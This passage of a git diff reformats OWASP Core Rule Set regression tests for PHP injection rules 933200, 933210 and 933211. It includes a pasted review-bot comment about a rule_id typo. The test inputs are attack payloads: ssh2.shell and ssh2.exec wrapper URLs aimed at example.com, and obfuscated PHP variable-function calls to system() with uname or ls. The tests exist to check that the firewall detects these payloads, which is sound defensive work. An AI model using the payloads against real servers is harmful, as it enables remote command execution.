"localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=lz77://some_file.lz" - version: 
HTTP/1.1 - output: - no_log_contains: id "933200" - - test_title: 933200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=lz77://some_file.lz" + version: HTTP/1.1 + output: + log: + no_expect_ids: [933200] + - test_id: 6 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 7 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 8 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 9 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 10 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml index 49c79d906..74a7285e7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml 
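Review bot: The new meta block for 933200.yaml sets `rule_id: 9331200`, a seven-digit value that matches neither the file name (933200.yaml) nor the `expect_ids: [933200]` / `no_expect_ids: [933200]` used by all ten tests in this hunk; it reads as a typo for the six-digit rule id. If go-ftw uses rule_id to name or filter tests (as the other migrated files with `rule_id: 933190` and `rule_id: 933210` suggest), this file would be reported under a non-existent rule and could be skipped by a per-rule run without any failure showing up. Change the line to `rule_id: 933200`.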
@@ -2,344 +2,343 @@ meta: author: "theMiddle, azurit" description: Test for "933210" PHP Variable Function bypass - enabled: true - name: 933210.yaml +rule_id: 933210 tests: - - test_title: 933210-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-7 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 
'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id 
"933210" - - test_title: 933210-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + 
output: + log: + expect_ids: [933210] + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Cookie: "x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 19 desc: Check FP if text contains quotes and round parenthesis stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 20 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 21 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] 
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
index 837538cfd..5c7d7b8a4 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
@@ -2,344 +2,343 @@ meta: author: "karelorigin, azurit" description: Test for "933211" PHP Variable Function bypass - enabled: true - name: 933211.yaml +rule_id: 933211 tests: - - test_title: 933211-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: 